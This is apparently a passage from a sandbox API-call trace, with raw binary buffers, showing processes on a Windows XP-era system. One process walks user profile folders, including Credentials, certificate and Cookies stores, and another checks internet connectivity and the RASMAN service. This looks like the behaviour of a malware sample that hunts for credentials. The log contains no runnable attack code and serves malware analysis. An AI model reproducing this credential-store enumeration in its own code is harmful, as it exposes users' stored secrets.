S\xb1\x93\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:58,442 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,442 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,522 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\G5UDWJ6L\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:58,522 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01 S\xb1\x93\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:58,522 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,522 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,522 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,522 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,522 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,522 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,602 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:58,602 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`T8H\xd5I\xcd\x01\xb0; (\xf2\x91\xcf\x01\x10\x88^H\xd5I\xcd\x01\x10\x88^H\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"ar\x80\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xb0; (\xf2\x91\xcf\x01p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:58,602 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,683 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\*.* |
SUCCESS | 0x0016ce68 | |
| 07:43:58,683 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01\xb0; (\xf2\x91\xcf\x01p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00M\x00I\x00C\x00R\x00O\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:43:58,683 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,763 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:58,763 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00\xd0\xa4dH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00R\x00E\x00D\x00E\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00r\x00e\x00d\x00e\x00n\x00t\x00i\x00a\x00l\x00s\x000\x00.\x00\x80\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:58,763 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,843 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\Credentials\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:58,843 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xa4dH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xda\x00\x00\x00\x00\x00\x00\x00\x00\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00-\x001\x00-\x005\x00-\x002\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:43:58,843 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:58,923 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\*.* |
SUCCESS | 0x00169d50 | |
| 07:43:58,923 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00,fH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:58,923 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,923 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:58,923 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,003 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:59,003 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:59,003 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:59,003 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:59,003 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:59,013 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\Internet Explorer\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:59,013 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01P\xba\xaa\xce\xd4I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,023 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,023 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,103 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\Media Player\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:59,103 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,103 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,103 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,183 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\SystemCertificates\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:59,183 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xda\x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00y\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,183 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,263 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\SystemCertificates\My\*.* |
SUCCESS | 0x00169d50 | |
| 07:43:59,263 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00E\x00R\x00T\x00I\x00F\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00e\x00r\x00t\x00i\x00f\x00i\x00c\x00a\x00t\x00e\x00s\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:59,263 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,344 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\*.* |
SUCCESS | 0x00169d88 | |
| 07:43:59,344 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,344 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,344 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,424 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\*.* |
SUCCESS | 0x00169d88 | |
| 07:43:59,424 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,424 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,424 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,654 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\*.* |
SUCCESS | 0x00169d88 | |
| 07:43:59,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01`\xb0M2oI\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,654 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,734 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Cookies\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:59,734 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p#IH\xd5I\xcd\x01p#IH\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xa0\xaaJH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,734 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:59,734 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,804 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:59,804 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:59,804 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016f328 | |
| 07:43:59,804 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016f328 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016e1d8 | |
| 07:43:59,804 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:59,804 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:59,804 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:59,814 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\*.* |
SUCCESS | 0x0016ea40 | |
| 07:43:59,814 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x15FH\xd5I\xcd\x01\x10J#(\xf2\x91\xcf\x01\xa0\x1dcH\xd5I\xcd\x01\x10\x9e\xec0\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x80\x00\x00\x00\x00\x00\x00\x00\xe0\x00]H\xd5I\xcd\x01\x10J#(\xf2\x91\xcf\x01\x10\x88^H\xd5I\xcd\x01\x10\x9e\xec0\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xa0\x1dcH\xd5I\xcd\x01\x10\x9e\xec0\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:43:59,814 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,894 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Application Data\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:59,894 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x00]H\xd5I\xcd\x01\x10J#(\xf2\x91\xcf\x01\x10\x88^H\xd5I\xcd\x01\x10\x9e\xec0\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x00\x00\x00\x00\x00\x00\x00\x00\x10\x88^H\xd5I\xcd\x01\x10J#(\xf2\x91\xcf\x01\x10\x88^H\xd5I\xcd\x01\x10\x88^H\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00M\x00I\x00C\x00R\x00O\x00S\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:43:59,894 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:59,974 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\*.* |
SUCCESS | 0x00169d50 | |
| 07:43:59,974 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\x88^H\xd5I\xcd\x01\x10J#(\xf2\x91\xcf\x01\x10\x88^H\xd5I\xcd\x01\x10\x88^H\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00O\xc2\x97\xeb \xdax\x00\x00\x00\x00\x00\x00\x00\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00R\x00E\x00D\x00E\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00r\x00e\x00d\x00e\x00n\x00t\x00i\x00a\x00l\x00s\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x88^H\xd5I\xcd\x01\x10J#(\xf2\x91\xcf\x01\x10\x88^H\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:59,974 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:00,055 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Credentials\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:00,055 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\xd0\xa4dH\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00-\x001\x00-\x005\x00-\x002\x000\x00 |
SUCCESS | 0x00000000 | |
